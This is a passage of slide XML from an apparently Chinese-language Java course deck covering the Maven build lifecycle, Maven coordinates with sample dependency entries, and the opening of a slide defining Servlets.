              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2651319">
                <a:off x="1103889" y="6012233"/>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073475" y="5693357"/>
                <a:ext cx="10198570" cy="1362490"/>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1097275" y="5728120"/>
                <a:ext cx="1053296" cy="3009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Maven</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>作用</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="256900" y="3044952"/>
            <a:ext cx="2548741" cy="2746589"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5803"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形: 对角圆角 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030372" y="3172781"/>
            <a:ext cx="1010035" cy="382116"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="48D6D2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>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清理</a:t>
            </a:r>
            <a:endPar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矩形: 对角圆角 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811493" y="3699985"/>
            <a:ext cx="1010035" cy="382116"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="48D6D2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>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编译</a:t>
            </a:r>
            <a:endPar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矩形: 对角圆角 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587833" y="4227189"/>
            <a:ext cx="1010035" cy="382116"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="48D6D2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>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测试</a:t>
            </a:r>
            <a:endPar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矩形: 对角圆角 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349833" y="4754393"/>
            <a:ext cx="1010035" cy="382116"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="48D6D2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>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打包</a:t>
            </a:r>
            <a:endPar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矩形: 对角圆角 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6085549" y="5281597"/>
            <a:ext cx="1010035" cy="382116"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="48D6D2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>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发布</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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5" name="连接符: 肘形 95"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3505368" y="3584918"/>
            <a:ext cx="336146" cy="276103"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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连接符: 肘形 96"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4284099" y="4114513"/>
            <a:ext cx="336146" cy="271322"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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连接符: 肘形 97"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5053269" y="4648887"/>
            <a:ext cx="336146" cy="256982"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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连接符: 肘形 98"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5802127" y="5189233"/>
            <a:ext cx="336146" cy="230698"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4265138" y="3158015"/>
            <a:ext cx="10500995" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>清除项目中无效的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092850" y="3722969"/>
            <a:ext cx="10500995" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生成字节码文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650942" y="4194684"/>
            <a:ext cx="10500995" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检查项目问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6494718" y="4736044"/>
            <a:ext cx="10500995" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>打成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207096" y="5277404"/>
            <a:ext cx="10500995" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器部署发布</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="灯片编号占位符 2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1"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1"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1"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1"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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14"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76952" y="1100222"/>
            <a:ext cx="10698800"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en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>坐标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721518" y="1652532"/>
            <a:ext cx="10748963" cy="1342596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90000" tIns="46800" rIns="90000" bIns="46800" rtlCol="0">
            <a:normAutofit fontScale="925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lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>什么是坐标？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>Maven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>中的坐标</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是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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资源的唯一标识，通过该坐标可以唯一定位资源位置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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使用坐标来定义项目或引入项目中需要的依赖。</a:t>
            </a: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Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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文本占位符 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710880" y="2995128"/>
            <a:ext cx="10748963" cy="1683308"/>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28600" indent="-228600" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" spc="150" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>Maven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" spc="150" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>坐标主要组成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" spc="150" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="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groupId</a:t>
            </a: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：定义当前</a:t>
            </a:r>
            <a:r>
              <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Maven</a:t>
            </a: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项目隶属组织名称（通常是域名反写，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="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com.itheima</a:t>
            </a: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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0"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artifactId</a:t>
            </a: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：定义当前</a:t>
            </a:r>
            <a:r>
              <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Maven</a:t>
            </a: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项目名称（通常是模块名称，例如 </a:t>
            </a:r>
            <a:r>
              <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order-service</a:t>
            </a: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goods-service</a:t>
            </a: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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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version</a:t>
            </a:r>
            <a:r>
              <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：定义当前项目版本号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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矩形: 圆角 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737248" y="4776262"/>
            <a:ext cx="3775837" cy="1511558"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6109"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>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groupId</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&gt;com.itheima&lt;/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groupId</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a:t>
            </a:r>
            <a:b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artifactId</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&gt;maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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-project01</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artifactId</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a:t>
            </a:r>
            <a:b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version</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&gt;1.0-SNAPSHOT&lt;/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version</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN">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矩形: 圆角 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6906407" y="4771596"/>
            <a:ext cx="3775837" cy="1651517"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6109"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>
          </a:solid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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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dependency</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a:t>
            </a:r>
            <a:b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groupId</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&gt;ch.qos.logback&lt;/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groupId</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a:t>
            </a:r>
            <a:b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artifactId</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&gt;logback-classic&lt;/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artifactId</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a:t>
            </a:r>
            <a:b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version</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&gt;1.2.3&lt;/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version</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a:t>
            </a:r>
            <a:b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b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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0033B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dependency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="080808"/>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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="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灯片编号占位符 7"/>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7"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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ervlet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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36" name="组合 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="782320" y="1654699"/>
            <a:ext cx="11262925" cy="3447879"/>
            <a:chOff x="782320" y="1654699"/>
            <a:chExt cx="11262925" cy="3447879"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="组合 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="782320" y="1654699"/>
              <a:ext cx="11262925" cy="3447879"/>
              <a:chOff x="920209" y="1823316"/>
              <a:chExt cx="11044172" cy="3447879"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823317"/>
                <a:ext cx="11044172" cy="3447878"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4761"/>
                  <a:gd name="adj2" fmla="val 4001"/>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40000" bIns="180000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>定义</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t> Java Servlet </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>是运行在 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Web </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>服务器或应用服务器上的程序，它是作为来自 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Web </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>浏览器或其他 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>HTTP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>客户端的请求和 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>HTTP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>服务器上的数据库或应用程序之间的中间层。 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>理解：</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="874395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>就是</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
